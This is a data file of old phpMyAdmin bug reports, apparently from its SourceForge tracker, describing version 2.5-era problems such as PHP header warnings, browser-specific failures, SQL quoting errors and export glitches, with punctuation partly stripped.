Notice Undefined index scheme in home www mysql main.php on line 23 Warning Cannot add header information headers already sent by output started at home www mysql main.php 23) in home www mysql main.php on line 25 Warning Cannot add header information headers already sent by output started at home www mysql main.php 23) in home www mysql libraries ob.lib.php on line 65 Warning Cannot add header information headers already sent by output started at home www mysql main.php 23) in home www mysql libraries header http.inc.php on line 14 Warning Cannot add header information headers already sent by output started at home www mysql main.php 23) in home www mysql libraries header http.inc.php on line 15 Warning Cannot add header information headers already sent by output started at home www mysql main.php 23) in home www mysql libraries header http.inc.php on line 16 Warning Cannot add header information headers already sent by output started at home www mysql main.php 23) in home www mysql libraries header http.inc.php on line 17 Warning Cannot add header information headers already sent by output started at home www mysql main.php 23) in home www mysql libraries header http.inc.php on line 20 Original URL https sourceforge.net p phpmyadmin bugs 864 https sourceforge.net p phpmyadmin bugs 864 Original author anonymous","bug"
"24444","7234","cfg[ MaxExactCount ] is ignored when BROWSING.
Hi, the cfg[ MaxExactCount ] is ignored when I browse through the tables.
Sure, phpmyadmin would prefer to get the exact row count because when the estimated row count is lower than the real count I may not be browseable through whole table.
Maybe you can make a further configuration option cfg[ MaxExactCountBrowsing ] I am willing to bart the exact results of table length by the speed gain because I know what to do when this happens).
Maybe others do not want this because they do not know what to do then, when phpma reports lower estimated table rows than they are in reality but believe me on a 4 Gig RAM 2x Xeon4 2.8 GHz table browsing in innoDB using phpmyadmin with 5 Mio.
Rows is no fun.
How I realized the bug Clicking onto the amp;quot; amp;gt; amp;quot; button in the browse site gives the result of the next 30 rows in reality in 17 seconds.
Mysql says Query took 0.0062 secs.
The rest amp;gt;16 seconds were obviously amp;gt;show processlist) used for SELECT SQL CALC FOUND ROWS FROM `table` LIMIT 1 Maybe you have an idea.
Thank you and best Regards, Peter Original URL https sourceforge.net p phpmyadmin bugs 865 https sourceforge.net p phpmyadmin bugs 865 Original author anonymous Found in version 2.5.0","bug"
"24444","7235","Problems with MSIE in v.2.5.0 not in 2.4.0).
In version 2.5.0 if I select to view status using MSIE 6.0 sp1) it hangs for a good 5 minutes before I got impatient and clicked on another link.
No other page in the site gave me problems but the status one.
Did not have this problem with any other browser I tried Opera, Mozilla, Netscape).
Noticed MSIE 6.0 also wouldn t release re use waiting active persistent connections that haven t timed out) but simply open more.
This suggested to me a problem with IE using the HTTP 1.1 protocol.
So I tried changing the IE browser to just use 1.0 instead and the problem went away.
However I can use the HTTP 1.1 protocol in phpMyAdmin 2.4.0 just not in 2.5.0 tried the pre release version of 2.5.0 before stable and it worked on and off).
Until I can figure out why 2.5.0 doesn t like MSIE 6.0 I tried changing my apache s httpd.conf file to use BrowserMatch to downgrade it and not use persistent connections.
On browsing non phpMyAdmin pages this happened but when going to phpMyAdmin it always responded with a HTTP 1.1 Doing some quick tests revealed apache responds with HTTP 1.1 when I have authentication in phpMyAdmin set to http The fact it worked fine in 2.4.0 and not 2.5.0 suggests that there was a change that went against MSIE 6.0 standards not necessarily http standards as M is horrible at following them).
Original URL https sourceforge.net p phpmyadmin bugs 866 https sourceforge.net p phpmyadmin bugs 866 Original author jjcarlson Found in version 2.5.0","bug"
"24444","7236","Validate SQL.
Fatal error Cannot pass parameter 2 by reference in usr local apache htdocs db libraries sqlvalidator.class.
php on line 108 Original URL https sourceforge.net p phpmyadmin bugs 867 https sourceforge.net p phpmyadmin bugs 867 Original author deepz0ne Found in version 2.5.0","bug"
"24444","7237","Database with in name can t be selected.
At the left frame, in the databases list, when a database name like my database is selected it will not show the tables.
email me if necessary gabriel at reguly net ) Original URL https sourceforge.net p phpmyadmin bugs 868 https sourceforge.net p phpmyadmin bugs 868 Original author anonymous Found in version 2.5.0","bug"
"24444","7238","Bug in amp;quot;SELECT amp;quot; when enum has amp;quot;empty string amp;quot;.
I have a field define below status enum invalid , blocked , pending , ) but when use amp;quot;select amp;quot; it show like this status enum invalid , blocked , pending , \ ) and I can t choose to select data.
When I still click submit, it will happen ERROR Unclosed quote 451 STR SQL SELECT `id` FROM `list` WHERE 1 AND `status` LIKE \ LIMIT 0, 30 Original URL https sourceforge.net p phpmyadmin bugs 869 https sourceforge.net p phpmyadmin bugs 869 Original author doggy8088 Found in version 2.5.0","bug"
"24444","7239","Problems with quot; quot; in db names.
This the original configuration db=aedo club it user = xxxx pwd = yyyy privileges mysql user) = N,N,N,....N privileges mysql db)=localhost, aedo club it, xxxx, Y,Y,Y....Y Well, when I login with xxxx yyyy I m able to create a new database and in the field create database I get the suggestion amp;quot;aedo?club?it amp;quot; Changin the db name from amp;quot;aedo club it amp;quot; to simply amp;quot;aedo amp;quot; everythig goes right Original URL https sourceforge.net p phpmyadmin bugs 870 https sourceforge.net p phpmyadmin bugs 870 Original author incuboartico Found in version 2.5.0","bug"
"24444","7240","Blank screen.
when opening phpmyadmin 2.5.1 cvs, I only see a blank screen.
I am operating on Linux with MySql 4.1.0 This Error hasn t occured with the previous Versions testet with 2.5.0, 2.4.0 and 2.3.3) Original URL https sourceforge.net p phpmyadmin bugs 871 https sourceforge.net p phpmyadmin bugs 871 Original author anonymous Found in version Latest Git","bug"
"24444","7241","Back link error .... if I submit an error query from main window of PMA and click on [back] link in window with error PHP generate error amp;gt; amp;gt; undefined var.
table in tbl properties common.php on line 24 see this Notice Undefined variable table in D \jenik\www\temp\admin\tbl properties common.php on line 24 Warning Cannot modify header information headers already sent by output started at D \jenik\www\temp\admin\tbl properties common.php 24 ) in D \jenik\www\temp\admin\libraries\db table exists.lib.ph p on line 30 amp;lt; amp;lt; this is a full text from main window ... thx.
querywin is set to true querywinJS is too true but QW query window) is close.
PMA 2.5.1 dev 21.5.)
Original URL https sourceforge.net p phpmyadmin bugs 872 https sourceforge.net p phpmyadmin bugs 872 Original author jenix","bug"
"24444","7242","Can t edit when blob added.
When I add a blob column to an existing table, I can t edit or delete existing rows.
The error is Unknown column 0x in where clause It seems that the xc2x91 signs is missing aka SELECT FROM `mytable` WHERE `id` = 1 AND `date` = 20030115 AND `subject` = Test AND `picture` LIKE 0x When I insert a new row, there is no problem xc2x96 and I can edit it too it displays a form button instead of the text link, at the new row??)
Original URL https sourceforge.net p phpmyadmin bugs 873 https sourceforge.net p phpmyadmin bugs 873 Original author thingmand Found in version 2.5.0","bug"
"24444","7243","amp;quot;Databases amp;quot; dropdown in LightFrame does not show.
When I select a Database in the Dropdown Menxc3xbc on left side then its OK.
But when I then select amp;quot;Databases amp;quot; in hte same Dropdown, then the right Side not actually refresh and show me all the Databases.
There is an mistake in the amp;quot;left.php amp;quot; on line 177.
There is a wrong action amp;quot;left.php amp;quot; instead of amp;quot;index.php amp;quot;) and a wrong target amp;quot;nav amp;quot; instead of amp;quot; parent amp;quot;).I give you the corrected amp;quot;left.php amp;quot; as attachment.
I use the Internet Explorer 5.5 on W2000.
Thats all.
Best Regards Kai Butschkau Teamleiter Entwicklungsabteilung Eichenauer Computer Beratung Max von Laue Straxc3x9fe 3 D 76829 Landau i. d. Pfalz Germany Fon 49 0)6341 592 166 Fax 49 0)6341 592 200 Mail butschkau ecb gmbh.de Original URL https sourceforge.net p phpmyadmin bugs 874 https sourceforge.net p phpmyadmin bugs 874 Original author anonymous Found in version 2.5.0","bug"
"24444","7244","Query window doesn t function in Safari.
In Apple s Safari, the query window opens up as if you hadn t chosen a database no matter what.
When you choose your database and enter a query, pressing amp;quot;Go amp;quot; does nothing.
I duplicated the process in Mac IE and the query went through correctly, so it is browser specific.
Original URL https sourceforge.net p phpmyadmin bugs 875 https sourceforge.net p phpmyadmin bugs 875 Original author punquin Found in version 2.5.0","bug"
"24444","7245","PMA tables parameters CASE insensitive under Windows.
Contents of message Main issue severity high phpMyAdmin installation mostly fails, frustrating initial users.
small issue on name of config file attached pasteable script for phpMyAdmin setup to paste into MySQL prompt note environment described below) The configuration manual installed with phpMyAdmin on installdir phpMyAdmin 2.5.0 Documentation.html contains several instructions like === begin quote within this database create a table following this scheme CREATE TABLE `PMA bookmark` id int 11) DEFAULT 0 NOT NULL auto increment, dbase varchar 255) NOT NULL, user varchar 255) NOT NULL, label varchar 255) NOT NULL, query text NOT NULL, PRIMARY KEY id) ) TYPE=MyISAM COMMENT= Bookmarks ; enter the table name in cfg[ Servers ][ i] [ bookmarktable ] === end quote The config file itself proposes default values like PMA bookmark for the cfg[ Servers ][ i] [ bookmarktable ] parameter in the config.inc.php file.
Note That is file is mistakingly called config.inc.php3 in the same document.
The problem is that this does not work because if CASE IN)SENSITIVITY of the windows platform because of a double issue a) when executing the proposed CREATE TABLE statements on the WinXP cmd prompt, all tables are create with lower case table names.
This works from a MySQL perspective but I will still report this with them because if does not follow normal Windows conventions where one can use amp;quot;cased amp;quot; names that are use in a amp;quot;case insensitive amp;quot; way).
b) The cfg[ Servers ] parameters that contain database names and maybe also the ones with file names, I have not tested this) are treated in a case sensitive way on a Windows platform.
This case sensitivity is expected on Linux but should not be there on Windows platforms.
Additionally I ve created and included a file that contains all I believe) the SQL statements that need to be typed into the command prompt of MySQL for complete initial phpMyAdmin install.
This file could be a timesaver for installations.
Hopefully you can cross check its correctness and post it as a link from the documentation, to make it much easier for phpMyAdmin installers.
Server and host Apache 2 on Win XP single machine running server and client) MySQL version 4.0.13 max debug phpMyAdmin 2.5.0 Original URL https sourceforge.net p phpmyadmin bugs 876 https sourceforge.net p phpmyadmin bugs 876 Original author blouwagie","bug"
"24444","7246","2.5.1 rc1 frameset generation.
in index.php line 100 unclear trinary operator amp;gt; no right frame echo amp;lt;frame src= amp;quot; .
empty db)) ?
main.php3 cfg[ DefaultTabDatabase ] .
?
.
url query .
amp;quot; name= amp;quot;phpmain .
phpmain hash .
amp;quot; frameborder= amp;quot;1 amp;quot; amp;gt; .
amp;quot;\n amp;quot;; must be echo amp;lt;frame src= amp;quot; .
empty db)) ?
main.php3 cfg[ DefaultTabDatabase ]) .
?
.
url query .
amp;quot; name= amp;quot;phpmain .
phpmain hash .
amp;quot; frameborder= amp;quot;1 amp;quot; amp;gt; .
amp;quot;\n amp;quot;; or echo amp;lt;frame src= amp;quot; ; echo empty db)) ?
main.php3 cfg[ DefaultTabDatabase ]; echo ?
.
url query .
amp;quot; name= amp;quot;phpmain .
phpmain hash .
amp;quot; frameborder= amp;quot;1 amp;quot; amp;gt; .
amp;quot;\n amp;quot;; Original URL https sourceforge.net p phpmyadmin bugs 877 https sourceforge.net p phpmyadmin bugs 877 Original author pvtc","bug"
"24444","7248","Go button in browse.
Some tables cause to display Go button bellow Edit link when browsing table.
Edit link works okay, Go button causes error No Database Selected).
Original URL https sourceforge.net p phpmyadmin bugs 879 https sourceforge.net p phpmyadmin bugs 879 Original author nijel Found in version Latest Git","bug"
"24444","7249","Space is in wrong place.
ALTER TABLE `articles` ADD `publish` ENUM 0 , 1 )DEFAULT 1 NOT NULL AFTER `featurename` ; I believe the space for this part ENUM 0 , 1 )DEFAULT is in the wrong place.
There is a space after the last but no space between the ) and the D. Minor bug, its the output of what I just did.
Original URL https sourceforge.net p phpmyadmin bugs 880 https sourceforge.net p phpmyadmin bugs 880 Original author anonymous Found in version 2.4.0","bug"
"24444","7250","backslash in password cookie mode.
If you put a backslash in your password changed via user password), it is changed correctly proved by login from command line).
Then, login with http auth mode work, but with cookie mode, you have to double the backslash.
Original URL https sourceforge.net p phpmyadmin bugs 881 https sourceforge.net p phpmyadmin bugs 881 Original author lem9 Found in version 2.5.1 rc1","bug"
"24444","7251","probably garbage data in input repeat cells amp; action url s. If I browse pagewise through table data, the input field repeat cells contains a growing number of arbitrary additional data, which may cause the web server to respond with a 400 bad request status, if the garbage data are not properly www url formencoded by the browser happened with \{ and NS 7.01).
For example see also the attached file) repeat cells=1004xc5x88tx04 Original URL https sourceforge.net p phpmyadmin bugs 882 https sourceforge.net p phpmyadmin bugs 882 Original author zimpel Found in version 2.5.0","bug"
"24444","7252","about mysql 4.1 alpha..... i m trying.....and trying ..... and I GOT IT !!!
i m talking about the error in the amp;quot;insert char field amp;quot; in the update form) that is, you can see only a part of the field property ex.
amp;quot;archar 30) not null ..... amp;quot;) and you can NOT edit the field ... well, just copy the table with a other name... client amp;gt; client2... with the operation session of phpmyadmin) i don t know how .... but in this table i can update the fields in the normal way .....!!!
so if you want to use phpmyadmin with mysql 4.1 you have just... to copy the tables in a different name, CHECK if the new table works, delete the older one or better rename them with a bak suffix or so ...), and rename the first copies of your database table with their original names .....
I can work well this well ... good luck to you ... bye Original URL https sourceforge.net p phpmyadmin bugs 883 https sourceforge.net p phpmyadmin bugs 883 Original author anonymous Found in version 2.5.1 rc1","bug"
"24444","7253","iconv errors.
With the latest CVS version, I recieve the following error once I logged in Notice iconv ) Wrong charset, cannot convert from `utf 8 to `iso 8859 1 IGNORE in D \Webserver\phpMyAdmin\libraries\charset conversion.
lib.php3 on line 248 Notice iconv ) Wrong charset, cannot convert from `utf 8 to `iso 8859 1 IGNORE in D \Webserver\phpMyAdmin\libraries\charset conversion.
lib.php3 on line 248 But this only happens on my second test machine, my first one works fine.
Original URL https sourceforge.net p phpmyadmin bugs 884 https sourceforge.net p phpmyadmin bugs 884 Original author rabus Found in version Latest Git","bug"
"24444","7254","LIMIT is being wrongfully added to queries.
Hello, I first noticed the problem when I tried mysql to suggest a structure, phpmyadmin generated a wrong sql query SELECT FROM `table` PROCEDURE ANALYSE ) LIMIT 0 , 30 Limit breakes the query, phpmyadmin says that 0 rows returned when in fact mysql returned an error.
After checking out I noticed that is analyse = eregi [[ space ]] PROCEDURE [[ space ]] ANALYSE\ , sql query)); returns null... Url is http blahblah phpadmin sql.php?lang=en iso 8859 1 amp;amp;server=1 amp;amp;db=DB amp;amp;table=TABLE amp;amp;goto=tbl properties structure.php amp;amp;back=tbl properties structure.php amp;amp;sessio n max rows=all amp;amp;sql query=SELECT 2A FROM 60TABLE 60 PROCEDURE ANALYSE 28 29 sql query is SELECT FROM `City` PROCEDURE ANALYSE ) Using php 4.3.2, MySQL 3.23.55 log , phpmyadmin 2.5.1 Gil Disatnik Original URL https sourceforge.net p phpmyadmin bugs 885 https sourceforge.net p phpmyadmin bugs 885 Original author gibsonlp Found in version 2.5.1","bug"
"24444","7255","GD2Available auto fails with PHP 4.1.2.
If the configuration variable GD2Available is set to auto , which it is by default, PHPMyAdmin returns a blank page to the browser.
Fix by setting GD2Available to no .
Version info PHPMyAdmin 2.5.1 OS WinXP SP1 PHP 4.1.2 Apache 1.3.27 MySQL 3.23.55 Browser MSIE 6 Original URL https sourceforge.net p phpmyadmin bugs 886 https sourceforge.net p phpmyadmin bugs 886 Original author lundiec Found in version 2.5.1","bug"
"24444","7256","nulltermination makes phpmyadmin to go mad.
Fields containing nulltermination \0) are confusing phpmyadmin.
Import the table below and try to edit the single value inside CREATE TABLE `test` `test` varchar 255) NOT NULL default ) TYPE=MyISAM; INSERT INTO `test` VALUES TEST\0 ); This happens mostly in tables that do not have a primary key to select by, phpmyadmin then selects using more than 1 field, if one of the fields have nulltermination it will cause phpmyadmin to have unclosed quote.
Original URL https sourceforge.net p phpmyadmin bugs 887 https sourceforge.net p phpmyadmin bugs 887 Original author gibsonlp Found in version 2.5.1","bug"
"24444","7257","corruption in exported SQL File with zip.
Hi there, There is a problem with the new option Save as file File name template It is possible to insert unallowed characters in the File name template, such as test test test TABLE or test test test DB if you save it directly or with gzip, the special characters are turned into amp;quot; amp;quot;, thats fine, but if you choose amp;quot;zipped amp;quot; as compression you get a corrupted zip file, because the special characters are not transformed before zipping.
greets, Joscha Original URL https sourceforge.net p phpmyadmin bugs 889 https sourceforge.net p phpmyadmin bugs 889 Original author joschafeth Found in version 2.5.1","bug"
"24444","7258","delete instead of truncate.
When I select a table s) from a database with checkbox es), and I select from the pull down menu the amp;quot;Empty amp;quot; option, the tables will be deleted, not truncated.
If You want any more info, pls contact me lay elgreco.hu Original URL https sourceforge.net p phpmyadmin bugs 888 https sourceforge.net p phpmyadmin bugs 888 Original author anonymous Found in version 2.5.1","bug"
"24444","7259","lt;legend gt; tags are not supported by old Safari versions.
I have see in the Export Tab that there is no amp;quot; Save as file amp;quot; check box also amp;quot;SQL options Documentation) amp;quot;, amp;quot;Export amp;quot;, amp;quot;Structure amp;quot; and amp;quot;Data amp;quot; should not be seen that trouble do not apear in PHPMyAdmin2.4 So Mac osx users should stay at PHPMyAdmin2.4...
Original URL https sourceforge.net p phpmyadmin bugs 890 https sourceforge.net p phpmyadmin bugs 890 Original author bunam Found in version 2.5.1","bug"
"24444","7260","showing all databases in dropdown.
Since I installed MySQL 4 there is a list of all databases in the database selection dropdown in the left frame.
I can see them, but I can t acces them.
I can t upgrade my production server to MySQL 4, because of this bug feature.
It don t want users to see databases other the those they have access to.
Original URL https sourceforge.net p phpmyadmin bugs 891 https sourceforge.net p phpmyadmin bugs 891 Original author derkgort","bug"
"24444","7261","Incorrect Permissions set on Image.
This is trivial, but it bothers me each time i see the permissions in the ls listing... You left the executable permission set for images spacer.gif Simple command to fix chmod ugo x path to spacer.gif Original URL https sourceforge.net p phpmyadmin bugs 894 https sourceforge.net p phpmyadmin bugs 894 Original author jaw959 Found in version 2.5.1","bug"
"24444","7262","Autodetect file type yields PHP warnings.
When uploading a bzip2 d file on the SQL page I received the following when Autodetect was selected.
Notice Undefined variable sql file compression in var www phpMyAdmin 2.5.1 read dump.php on line 114 and a bunch of probably due to the above) Warning Cannot modify header information headers already sent by output started at var www phpMyAdmin 2.5.1 read dump.php 114) in var www phpMyAdmin 2.5.1 libraries ob.lib.php on line 65 Adding a before sql file compression on line 114 of read dump.php fixed it.
Michael Johnson mjohnson at pitsco dot com I m not remembering my password right now) Original URL https sourceforge.net p phpmyadmin bugs 892 https sourceforge.net p phpmyadmin bugs 892 Original author anonymous","bug"
"24444","7263","HTTP auth fails when switching servers.
In my config.inc.php, I have two MySQL servers setup, one 4.0.12 on Win2K local to the web server running phpMyAdmin and the web browser, and the other 4.0.13 on RedHat8 on another box.
Both db servers are set up for HTTP authentication.
When I startup pma, I login to the Win2K server OK. Then on the pma window, I switch to the RedHat8 server, and click Go.
I login to that server OK. Now, I switch back to the Win2K server and click Go.
The HTTP authentication has forgotten the previous user entry even though it s supposed to have stored it), but I proceed to enter the user and password fails even though it succeeded the first go round).
The only way I can get back into the Win2K db server is to close the web browser and start up a new pma instance.
This is happening with pma 2.5.1 PHP 4.3.2 Apache Win 1.3.27) using IE 6 with all updates).
Original URL https sourceforge.net p phpmyadmin bugs 893 https sourceforge.net p phpmyadmin bugs 893 Original author smagruder Found in version 2.5.1","bug"
"24444","7264","Some parts broken when relations broken.
Query generator generates bad query when relations are broken eg.
bad table name for repations table).
Always is missing FROM, and maybe some other problems and user can not easily find this problem, because ho doesn t have to use db details structure.php3, where he can notice problems.
Anyway, why all other stuff gets disabled when relations table is bad?
How MIME, table info or displaying column comments depends on relations?
This was for first time discussed in forum https sourceforge.net forum forum.php?thread id=878554 amp;amp;forum id=72908 Original URL https sourceforge.net p phpmyadmin bugs 895 https sourceforge.net p phpmyadmin bugs 895 Original author nijel Found in version 2.5.1","bug"
"24444","7265","Safari Browser font sizes on Mac too big.
The font size for Safari should be the same as for Opera and Omniweb.
Its user agent is Mozilla 5.0 Macintosh; U; PPC Mac OS X; en) AppleWebKit 74 KHTML, like Gecko) Safari 74 amp;quot;74 amp;quot; is part of the version number amp;quot;1.0 Beta 2 v74) amp;quot; Safari is not a marginal browser, it will probably become the default in Mac OS X 10.3.
Original URL https sourceforge.net p phpmyadmin bugs 896 https sourceforge.net p phpmyadmin bugs 896 Original author skoot Found in version 2.5.1","bug"
"24444","7266","cfg[ DefaultTabServer ] is not used.
Changing cfg[ DefaultTabServer ] from it s default main.php to another value eg server databases.php ) has no effect on the default right frame.
In index.asp the frame src for phpmain is empty db) ?
main.php cfg[ DefaultTabDatabase ]) it should be empty db) ?
cfg[ DefaultTabServer ] cfg [ DefaultTabDatabase ]) Regards, Andrxc3xa9.
Original URL https sourceforge.net p phpmyadmin bugs 898 https sourceforge.net p phpmyadmin bugs 898 Original author anonymous Found in version 2.5.1","bug"
"24444","7267","LaTeX Export of structure failed fixed.
build dump.lib.php3 had two minor bugs in line 870 871 line 870 missed the FROM clause, line 871 misspelled error url Corrected lines see below local query = SHOW FIELDS FROM .
PMA backquote table) .
FROM .
PMA backquote db); result = PMA mysql query local query) or PMA mysqlDie , local query, , error url); My Email address ra ids.de Wolfgang Radke) Original URL https sourceforge.net p phpmyadmin bugs 899 https sourceforge.net p phpmyadmin bugs 899 Original author anonymous","bug"
"24444","7268","Keywords are mistakenly changed to upper case.
If you have a table named `session`, and for some reason the user enters this query SELECT FROM session; Without the backsticks around the table name, phpMyAdmin will turn the query into SELECT FROM SESSION; Which isn t that bad, I suppose, but the problem is that this is done before the query is executed so on case sensitive systems the query will result in an error because there is no `SESSION` table.
Now I know this can be classified under human error , but since phpMyAdmin is meant to be an easy to use tool even for non experts, who may not always know they have to use ` around names, it would be nice to at least semi solve this problem by changing the letter case only after the query is executed so it s only displayed differently.
Chen Avinadav chen at)avinadav dot)com Original URL https sourceforge.net p phpmyadmin bugs 897 https sourceforge.net p phpmyadmin bugs 897 Original author anonymous Found in version 2.4.0","bug"
"24444","7269","Wrong field names when exporting query results.
When exporting CSV data and selecting the amp;quot;Put fields names at first row amp;quot; [sic] option, phpMyAdmin always exports the complete list of fields in the table you re exporting even when exporting the results of a query that only selected a subset of fields.
IMO it would be more useful of the software only listed the names of fields that were actually selected in the order they were selected.
Original URL https sourceforge.net p phpmyadmin bugs 901 https sourceforge.net p phpmyadmin bugs 901 Original author mfichtner Found in version 2.5.1","bug"
"24444","7270","CSV Export inserts 1 at beginning of output.
When exporting CVS data, a 1 is inserted as the first character of the output.
For example 1 amp;quot;A amp;quot;; amp;quot;B amp;quot;; amp;quot;C amp;quot;; amp;quot;D amp;quot;; amp;quot;A amp;quot;; amp;quot;B amp;quot;; amp;quot;C amp;quot;; amp;quot;D amp;quot;; amp;quot;A amp;quot;; amp;quot;B amp;quot;; amp;quot;C amp;quot;; amp;quot;D amp;quot;; This is true for both amp;quot;CSV data amp;quot; and amp;quot;CSV for Ms Excel data amp;quot;.
Original URL https sourceforge.net p phpmyadmin bugs 900 https sourceforge.net p phpmyadmin bugs 900 Original author mfichtner Found in version 2.5.1","bug"
"24444","7271","Cant make SQL queries, Javascript errors.
Cant make SQL queries due to Javascript errors on Mozilla 1.0.1 Mozilla 5.0 X11; U; Linux i686; en US; rv 1.0.1) Gecko 20021003 because the submit button will not submit the form.
To reproduce 1) use browser above 2) select a database 3) open the Tools amp;gt; Web Development amp;gt; Javascript Console window 4) select SQL tab from phpMyAdmin page 5) error will show in Javascript Console window 6) click the [Go] button on the phpMyAdmin page and nothing happens Errors reported are Error uncaught exception Permission denied to get property HTMLDocument.title Error uncaught exception Permission denied to get property HTMLInputElement.value Error uncaught exception Permission denied to get property HTMLInputElement.value Original URL https sourceforge.net p phpmyadmin bugs 902 https sourceforge.net p phpmyadmin bugs 902 Original author woodbri Found in version 2.5.1","bug"
"24444","7272","New windows get opened instead of in right frame.
Apparently, after working a while with phpMyadmin 2.5.1, no link target seems to work to open the new page in the right frame.
What I mean is, when doing some operations during a minute of 5, and then click on a table in the table list, the table structure is not shown in the right frame where it should be, but always in a new window.
The link s target looks like this target= amp;quot;phpmainc4503693025e429f6a3772da83ddfea81055930877 amp;quot; while the right frame name name= amp;quot;phpmainc4503693025e429f6a3772da83ddfea81055929329 amp;quot; the problem can only be solved by restarting phpmyadmin by retyping the url and going to it with the brower.
Netscape 7.02, Windows XP, phpMyAdmin 2.5.1, PHP 4.3.2 , MySQL 3.23.56 max nt Original URL https sourceforge.net p phpmyadmin bugs 903 https sourceforge.net p phpmyadmin bugs 903 Original author anonymous Found in version 2.5.1","bug"
"24444","7273","Queries run multiple times.
Seemingly almost any time a query is run within phpMyAdmin 2.5.0 or higher to do anything, it runs the query at least twice.
I ve even seen occasions where I entered a DELETE query, I got a prompt screen which showed the query twice, and when I confirmed, it came back showing that the query had been run four times.
I don t think it s merely a display issue, as I m getting MySQL errors indicating that the operations are indeed being performed.
One example is when I tried to change the name of a table column, and phpMyAdmin came back with an ALTER... CHANGE query, with the CHANGE portion showing up twice, and MySQL came back saying that there was no column with the original column name I specified to be changed.
Original URL https sourceforge.net p phpmyadmin bugs 904 https sourceforge.net p phpmyadmin bugs 904 Original author mgturland Found in version 2.5.0","bug"
"24444","7274","JavaScript error 2.5.0).
I get from Version 2.5.0 on at each page call an error.
This error is causes by file footer.inc.php Line 29 In IE I get a Script Error Row xy Character 9 Error Access dinied Code 0 URL xy Because of that I have to switch back to 2.4.0, but I love the new features like the SQL History!!!!!
please help!
Thanks, Peter Original URL https sourceforge.net p phpmyadmin bugs 905 https sourceforge.net p phpmyadmin bugs 905 Original author anonymous","bug"
"24444","7275","DEFAULT 0 is transformed to default0 .
Hi, this must be a PHPMyAdmin bug, because the file is amp;quot;only amp;quot; a text file and doesn t contain any special characters or control chars.
SQL query CREATE TABLE mytable ID INT NOT NULL AUTO INCREMENT , LS key CHAR 4 ) , XA key TINYINT UNSIGNED NOT NULL DEFAULT 0, KEY ID ) , KEY LS NSchluessel ) , PRIMARY KEY ID ) ) \ g gets transformed to CREATE TABLE mytable ID INT NOT NULL AUTO INCREMENT , LS key CHAR 4 ) , XA key TINYINT UNSIGNED NOT NULL DEFAULT0, KEY ID ) , KEY LS NSchluessel ) , PRIMARY KEY ID ) ) \ g and spits out an error message that there was an error near default0 .
surprise!)
Thanks for fixing.
ae Original URL https sourceforge.net p phpmyadmin bugs 906 https sourceforge.net p phpmyadmin bugs 906 Original author andreas e Found in version 2.5.1","bug"
"24444","7276","Unable to import text files Query window).
When I try to use the Query Window to Import Files in the database, I get a popup message telling that there is a amp;quot;Missing value in the form !
amp;quot;.
The problem is that in the Import Files section of the Query Window there is no form to fill.
Only the amp;quot;Go amp;quot; button.
I am using phpMyAdmin 2.5.1 but the same problem was also in the 2.5.1 rc1 version.
Original URL https sourceforge.net p phpmyadmin bugs 907 https sourceforge.net p phpmyadmin bugs 907 Original author nkotsonis Found in version 2.5.1","bug"
"24444","7277","Unable to set Character Set MySQL 4.1).
Using MySQL 4.1 alpha) There seem to be various problems with the Character Set syntax.
When adding new fields, there is no way to specify character set.
For a VARCHAR column for example, the length values box only accepts a number specifying the max length of the field.
When trying to alter an existing column, the length values box is filled with for example) varchar 32) character set latin1 Trying to submit this change results in the erroneous MySQL command ALTER TABLE `tblMyTable` CHANGE `AColumn` `AColumn` VARCHAR varchar 32 ) CHARACTER SET latin1 ) NOT NULL when the proper syntax should be ALTER TABLE `tblMyTable` CHANGE `AColumn` `AColumn` VARCHAR 32 ) CHARACTER SET latin1 NOT NULL Similar problems may exist for setting the character sets on entire tables or databases.
Original URL https sourceforge.net p phpmyadmin bugs 908 https sourceforge.net p phpmyadmin bugs 908 Original author cc juju Found in version 2.5.1","bug"
"24444","7278","Incorrect ResultSet Count Shown for DISTINCT.
Hi There, I ve just noticed that PhpMyAdmin 2.5.1 appears to be returning the wrong result set could when one uses DISTINCT or GROUP BY in the SQL statement.
For example, the statement below give the result set count as all records in the table SELECT DISTINCT Location ) FROM `catalogue` LIMIT 0, 30 By the way, THANKS, PhpMyAdmin is an absolutely great set of scripts.
And it keeps getting better!
Regards, Don Original URL https sourceforge.net p phpmyadmin bugs 909 https sourceforge.net p phpmyadmin bugs 909 Original author anonymous Found in version 2.5.1","bug"
"24444","7279","export SELECT DISTINCT results.
The query amp;quot;SELECT DISTINCT `111`) FROM `test` amp;quot; returns the right rows, but the number of returned rows is 1, not 5 as it should be as of the current data of the public example) only checked in phpMyAdmin 2.5.2 dev) see bug 682386 as well).
Now, I click on amp;quot;export amp;quot; to export the results The query is now read to be amp;quot;SELECT `111`) FROM `test` amp;quot;, that is, the amp;quot;DISTINCT amp;quot; is gone for some reason tested in phpMyAdmin 2.5.0, 2.5.1 and 2.5.2 dev).
amp;quot;Export 1 record starting from row 0 amp;quot; is read there as well, I think it is the incorrectly aquired number of rows from the first query; amp;quot;Export 5 records starting from row 0 amp;quot; should be shown there.
only checked in phpMyAdmin 2.5.2 dev).
Original URL https sourceforge.net p phpmyadmin bugs 910 https sourceforge.net p phpmyadmin bugs 910 Original author ci dev Found in version Latest Git","bug"
"24444","7280","SQL without table produces warnings.
When I run eg.
SHOW VARIABLES LIKE safe\ show\ database I get Warning mysql fetch array ) supplied argument is not a valid MySQL result resource in srv www htdocs pma libraries mysql wrappers.lib.php3 on line 36 Warning mysql num fields ) supplied argument is not a valid MySQL result resource in srv www htdocs pma libraries mysql wrappers.lib.php3 on line 45 Notice Undefined offset 1 in srv www htdocs pma libraries relation.lib.php3 on line 312 Notice Undefined index len in srv www htdocs pma libraries sqlparser.lib.php3 on line 654 Warning Variable passed to each ) is not an array or object in srv www htdocs pma libraries relation.lib.php3 on line 315 and then results for that...
Original URL https sourceforge.net p phpmyadmin bugs 912 https sourceforge.net p phpmyadmin bugs 912 Original author nijel Found in version Latest Git","bug"
"24444","7281","timestamp export fails MySQL 4.1).
if you export a timestamp from mysql 4.1 it gets the normal datetime format, but is exported without quotes, thus you cant import it ...
I fixed lines 285 286 and 464 465 removed the timestamp entry witch works in my environment.
from if type == tinyint || type == smallint || type == mediumint || type == int || type == bigint || type== timestamp ) \{ to if type == tinyint || type == smallint || type == mediumint || type == int || type == bigint ) \{ greetings Original URL https sourceforge.net p phpmyadmin bugs 913 https sourceforge.net p phpmyadmin bugs 913 Original author steinboeck Found in version 2.5.1","bug"
"24444","7282","Denying Drop Structure shows wrong message.
Select a table.
Go to tab Structure.
Select a field and click Drop.
